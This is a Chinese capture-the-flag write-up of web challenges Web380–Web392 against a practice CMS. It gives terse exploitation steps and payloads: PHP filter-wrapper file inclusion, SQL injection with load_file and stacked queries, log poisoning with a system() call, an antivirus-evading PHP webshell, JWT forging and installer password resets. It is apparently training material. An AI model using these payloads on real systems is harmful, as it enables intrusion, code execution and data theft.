Web380

  • 先访问page.php,这是用于id传参的,有文件包含漏洞
  • id后转入php://filter/convert.base64-encode/resource=page 查看文件源码
  • 然后盲猜flag.php 就是直接id传入php://filter/convert.base64-encode/resource=flag.php

Web381

  • 进入主页,查看源代码,找到开头的第三个CSS链接,这个CSS链接和正常的路径不一样
  • 把路径删除到只有一级,访问,即可得到flag
  • 意义: 后台和前台共用CSS文件问题

Web382

  • 进入主页,查看源代码,找到开头的第三个CSS链接,这个CSS链接和正常的路径不一样
  • 把路径删除到只有一级,访问,进入后台
  • 直接用万能密码注入,xxx'or 1=1###

Web383

  • 同382

Web384

  • 爆破

Web385

  • 访问url/install,根据提示访问url/install/?install
  • 密码被重置,直接默认密码admin888获取flag

Web386

  • 通过主页源代码,"layui/css/tree.css" , 访问url/layui/css/tree.css
  • 注释:访问clear.php清除缓存
  • 然后传参url/clear.php?file=./install/lock.dat 来删除锁定文件
  • 然后访问url/install/?install 即可重置密码

Web387

  • 访问url/robots.txt 发现disabled了debug
  • 访问url/debug/?file=文件 实现文件包含
  • 日志写入 User-Agent 写入函数执行(写不了一句话) 写入<?php system('tac /var/www/html/alsckdfy/check.php'); ?>
  • 然后url/debug/?file=/var/log/nginx/access.log 右键查看源代码即可

Web388

  • 访问url/alsckdfy/editor/ 上传附件,选择小马的压缩包

    <?php
    //使用'.'进行免杀
    $shell='<?ph'.'p ev'.'al($_PO'.'ST[cmd])'.'; ?>';
    file_put_contents('/var/www/html/2.php',$shell);

  • url/debug/?file=压缩包马的路径 进行文件包含
  • 访问生成的一句话马的路径

Web389

  • 访问url/debug 发现权限不足,复制cookie中的auth中的值
  • https://jwt.io/#debugger-io 中解密,把user改为admin,下面的key随便输入
  • 然后执行Web388操作,注意访问url/debug的时候,要把cookie中的auth的值给替换掉

Web390

  • 点开文章,发现url变了,变为url/page/id=xxx
  • sql注入url/page.php/id=1 union select 1,2,substr((select load_file('/var/www/html/alsckdfy/check.php')),1,255) limit 1,1 %23
  • 对回显的地方进行sql注入,读取文件并且回显1-255个字符,然后执行后查看源代码

Web390

  • 随便进入一个文章,上面有所有框,随便填入
  • url/search.php?title=1' union select 1,substr((select load_file('/var/www/html/alsckdfy/check.php')),1,255),3 --+

Web391

  • 同Web390,要把路径换为/flag

Web392

  • 嵌入式ssrf
  • *搜索框注入,url/search.php?title=中国';update link set url='file:///flag';select 1,2,'a
最后修改:2022 年 05 月 05 日
如果觉得我的文章对你有用,请随意赞赏